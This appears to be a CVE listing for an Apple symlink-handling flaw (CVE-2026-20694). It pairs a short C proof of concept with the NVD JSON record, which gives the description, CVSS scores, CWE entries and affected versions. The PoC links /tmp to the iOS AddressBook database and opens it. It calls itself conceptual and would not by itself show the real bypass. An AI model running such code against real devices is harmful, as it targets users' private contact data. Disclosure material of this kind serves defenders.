CVE-2026-20694

#include <unistd.h> #include <stdio.h> /* * PoC for CVE-2026-20694 (Symbolic Link Handling Issue) * This is a conceptual demonstration of how a symlink might be used * to access sensitive data on a vulnerable system. */ int main(int argc, char *argv[]) { // Path to sensitive user data (example) const char *sensitive_file = "/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb"; // Location where the app can create a file const char *symlink_path = "/tmp/exploit_link"; printf("[+] Attempting to create symlink...\n"); // Create a symbolic link pointing to the sensitive file if (symlink(sensitive_file, symlink_path) == 0) { printf("[+] Symlink created successfully at %s\n", symlink_path); // Try to open the file through the symlink FILE *fp = fopen(symlink_path, "r"); if (fp) { printf("[+] Successfully opened sensitive file through symlink!\n"); printf("[+] Data access confirmed. Vulnerability exploited.\n"); fclose(fp); } else { printf("[-] Failed to open file.\n"); } // Clean up unlink(symlink_path); } else { printf("[-] Failed to create symlink.\n"); } return 0; }

{"cve": {"id": "CVE-2026-20694", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:06.217", "lastModified": "2026-03-26T20:16:09.393", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved handling of symlinks. This issue is fixed in iOS 26.3 and iPadOS 26.3, macOS Sequoia 15.7.4, macOS Sequoia 15.7.5, macOS Sonoma 14.8.4, macOS Sonoma 14.8.5, macOS Tahoe 26.3, macOS Tahoe 26.4. An app may be able to access user-sensitive data."}, {"lang": "es", "value": "Este problema se abordó con un manejo mejorado de enlaces simbólicos. Este problema está solucionado en iOS 26.3 y iPadOS 26.3, macOS Sequoia 15.7.4, macOS Sequoia 15.7.5, macOS Sonoma 14.8.4, macOS Sonoma 14.8.5, macOS Tahoe 26.3, macOS Tahoe 26.4. Una aplicación podría acceder a datos sensibles del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.3", "matchCriteriaId": "73ED2212-C513-4BE8-8EDB-40DF4323558E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.3", "matchCriteriaId": "DEC63AFD-9C97-45CD-80CF-CC60DF064838"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.4", "matchCriteriaId": "E899D2A7-973C-4A46-B479-C245E5DFABE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.4", "matchCriteriaId": "A5F7A1AF-3DD7-4FA1-BF78-4855F83BB463"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.3", "matchCriteriaId": "0488A377-7971-4703-8823-05BF1E23CF48"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126346", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126348", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126349", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126350", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126795", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126796", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}